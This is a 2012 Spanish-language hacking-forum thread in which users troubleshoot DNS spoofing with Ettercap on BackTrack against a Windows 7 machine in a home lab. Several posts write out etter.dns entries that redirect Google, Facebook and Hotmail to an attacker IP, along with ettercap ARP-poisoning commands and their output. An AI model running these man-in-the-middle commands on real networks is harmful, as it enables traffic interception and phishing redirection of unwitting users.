No funciona DNS Spoofing con Ettercap

Foro de elhacker.net

Seguridad Informática

Hacking (Moderador: toxeek)

No funciona DNS Spoofing con Ettercap

0 Usuarios y 2 Visitantes están viendo este tema.

Páginas: [1]

Autor

Tema: No funciona DNS Spoofing con Ettercap (Leído 11,958 veces)

rockernaxo

Desconectado

Mensajes: 2

No funciona DNS Spoofing con Ettercap

« en: 7 Febrero 2012, 09:34 am »

Hola, esta es la primera vez que escribo para este magnífico foro, ya que estoy empezando con Backtrack y hasta el momento todo iba sobre ruedas, pero me he atascado. La cuestión es que tengo dos máquinas virtuales conectadas con adaptador puente a la misma red local e intento redireccionar Internet en el Win 7 desde Backtrack mediante Ettercap. Hago todos los pasos que vienen repetidos en miles de tutoriales, lo he intentado tanto en el terminal como en el modo gráfico, y nada. En la máquina de Win 7 hago un

Código:

arp -a

y sí que mi router y backtrack tienen ahora la misma MAC, por lo que el MiTM no falla. ¿Saben ustedes qué podría ser? Gracias de antemano.


	En línea

Mordor

Ex-Staff

Desconectado

Mensajes: 2.007

Quirón, ora pro nobis

Re: No funciona DNS Spoofing con Ettercap

« Respuesta #1 en: 7 Febrero 2012, 22:49 pm »

Saludetes;)

Cita de: rockernaxo en 7 Febrero 2012, 09:34 am

ya que estoy empezando con Backtrack y hasta el momento todo iba sobre ruedas, pero me he atascado...intento redireccionar Internet en el Win 7 desde Backtrack mediante Ettercap. Hago todos los pasos que vienen repetidos en miles de tutoriales, lo he intentado tanto en el terminal como en el modo gráfico, y nada.

¿Qué es exactamente lo que haces? ¿Qué pasos realizas? Si no nos lo dices, no podemos adivinar qué haces mal. Me imagino que también saldrá algún mensaje de error o algo similar ¿Qué aparece..? Más información, necesitamos más información.


	En línea

La inteligencia es un vaso a llenar...

rockernaxo

Desconectado

Mensajes: 2

Re: No funciona DNS Spoofing con Ettercap

« Respuesta #2 en: 7 Febrero 2012, 23:42 pm »

Bueno, pues tengo un ordenador con dos máquinas virtuales (Virtual Box). Ambas están unidas a la misma red local, una red wifi casera, a través de mi ordenador Guest (Win 7). Bien, pues al lío:

Una máquina virtual tiene Bactrack y la otra Win 7, así que edito el archivo etter.dns y añado:
google.es A 69.55.61.177
*.google.es A 69.55.61.177
www.google.es PTR 69.55.61.177
Guardo y ahora inicio ettercap desde el terminal.

Código:

ettercap -Tq -P dns_spoof -M arp:remote /ip_router/ /ip_win7(víctima)/

Ahora supuestamente debería redireccionar el tráfico pero no lo hace, en la consola de backtrack me aparece que lo redirecciona, pero en realidad no lo hace, incluso a veces se me queda sin conexión.

PD: no, no obtengo ningún mensaje de error.


	En línea

jcvandamme

Desconectado

Mensajes: 1

Re: No funciona DNS Spoofing con Ettercap

« Respuesta #3 en: 4 Junio 2012, 18:22 pm »

Pues a mi tampoco me va, la diferencia con el es que yo ejecuto ettercap -Tq -P dns_spoof -M arp // //, no obstante tambien lo he probado poniendo la IP de gateway y la ip a "envenenar" pero el resultado es el mismo....lo unico que consigo es que al intentar ir a google simplemente dice que la web no existe, es decir, la ip llega a envenenarse pero no llega a redireccionar y eso que la redireccion iba a ser a una web que tengo aqui en local....mi archivo etter.dns es:
google.es A IP_LOCAL
*.google.es A IP_LOCAL
www.google.es PTR IP_LOCAL

Un cosa mas, las pruebas las he hecho con maquinas virtuales y tambien con otros equipos de la red, el resultado es el mismo. ¿Alguien sabe decirme que es lo que hago mal? Saludossssss

P.D: utilizo backtrack 5 R2


	En línea

SokarTefnut

Desconectado

Mensajes: 124

Re: No funciona DNS Spoofing con Ettercap

« Respuesta #4 en: 10 Septiembre 2012, 15:05 pm »

He probado el procedimiento solo funciona envenenado toda la red, pero con google parece imposible por ahora, he realizado la prueba con facebook y con hotmail y el DNS_SPOOF funciona perfectamente.

En mi caso
192.168.1.1 --> Router
192.168.1.35 --> Bactrack
192.168.1.34 --> Victima (Win 7) (Pruebas con IExplorer 9 y Firefox 14

Extracto de etter.dns -->

*.google.* A 192.168.1.35
*.facebook.* A 192.168.1.35
*.hotmail.* A 192.168.1.35
###############################################

Comienzo el ataque:

ettercap -T -q -P dns_spoof -M arp /192.168.1.1/ /192.168.1.34/

Consulto las tablas ARP en Win 7:
C:\Users\Tom>arp -a

Interfaz: 192.168.1.34 --- 0xb
  Dirección de Internet Dirección física Tipo
  192.168.1.1 08-00-27-1c-2d-bd dinámico
  192.168.1.33 08-00-27-fd-7c-58 dinámico
  192.168.1.35 08-00-27-1c-2d-bd dinámico

Vacio la cache de DNS en Win 7:
C:\Users\Tom>ipconfig /flushdns
   Configuración IP de Windows
   Se vació correctamente la caché de resolución de DNS.

Intento abric google,facebook y hotmail, no obteniendo los resultados esperados (DNSSPOOF),se siguen abriendo las páginas originales.

Si el envenenamiento lo realizo de la suiguiente manera:
ettercap -T -q -P dns_spoof -M arp // //

si funciona con facebook y con hotmail, pero curiosamente Google no es redireccionado hacia mi página falsa.

Si desde Windows analizo las resoluciones almacenadas hasta el momento,se observa que aunque la resolucion para google es la correcta (con mi etter.dns), la página no abre.
C:\Users\Tom>ipconfig /displaydns

   Configuración IP de Windows

   www.facebook.com
   ----------------------------------------
   Nombre de registro . : www.facebook.com
   Tipo de registro . . : 1
   Período de vida . . . : 3581
   Longitud de datos . . : 4
   Sección . . . . . . . : respuesta
   Un registro (host). . : 192.168.1.35

   www.hotmail.es
   ----------------------------------------
   Nombre de registro . : www.hotmail.es
   Tipo de registro . . : 1
   Período de vida . . . : 3590
   Longitud de datos . . : 4
   Sección . . . . . . . : respuesta
   Un registro (host). . : 192.168.1.35

   www.google.es
   ----------------------------------------
   Nombre de registro . : www.google.es
   Tipo de registro . . : 1
   Período de vida . . . : 3566
   Longitud de datos . . : 4
   Sección . . . . . . . : respuesta
   Un registro (host). . : 192.168.1.35

En ambos navegadores tengo como página de inicio predeterminada www.google.es, no se
si tiene algo que ver con el fallo del DNS_SPOOF.


« Última modificación: 10 Septiembre 2012, 16:32 pm por SokarTefnut »	En línea

"Saber romper medidas de seguridad no hace que seas hacker, al igual que saber hacer un puente en un coche no te convierte en un ingeniero de automoción"
-- Eric Raymond -- http://en.wikipedia.org/wiki/Eric_S._Raymond

morodog

Desconectado

Mensajes: 105

Re: No funciona DNS Spoofing con Ettercap

« Respuesta #5 en: 10 Octubre 2012, 05:18 am »

Sí a mi también me pasa, me funciona con todas las webs menos con google. FuCK


	En línea

@nachosanzu

youtube.com/haztuclick

cyberboom!

Desconectado

Mensajes: 26

Re: No funciona DNS Spoofing con Ettercap

« Respuesta #6 en: 4 Noviembre 2012, 03:54 am »

yo configuro el etter.dns, primeramene localizado con un locate etter.dns,

Código:

*.google.*             A       127.0.0.1
*.facebook.*          A      127.0.0.1
*.hotmail.*            A      127.0.0.1

despues hago un:

Código:

ettercap -T -q -i wlan0 -P dns_spoof -M arp //

y todas las webs son spoofeadas de maravilla:p


	En línea

Páginas: [1]

Ir a:

Mensajes similares
	Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
	DNS Spoofing usando Ettercap (en Ubuntu) by v-getah Hacking	V-Getah	5	21,807	10 Agosto 2012, 13:53 pm por Stakewinner00
	[Ettercap+Metasploit] Suplantación de identidad por nombre de dominio [Spoofing] « 1 2 3 » Hacking	Shell Root	22	29,411	19 Septiembre 2012, 16:51 pm por Milo_EscorpioNN
	¿Funciona el DNS spoofing? Hacking	Kaxperday	0	2,489	22 Septiembre 2015, 18:33 pm por Kaxperday
	dns spoofing ettercap y set Hacking	Gege387	2	2,555	21 Marzo 2016, 15:20 pm por Gege387
	bettercap dns spoofing no funciona Hacking	juanpalomo098	5	5,900	29 Diciembre 2017, 01:31 am por aguro90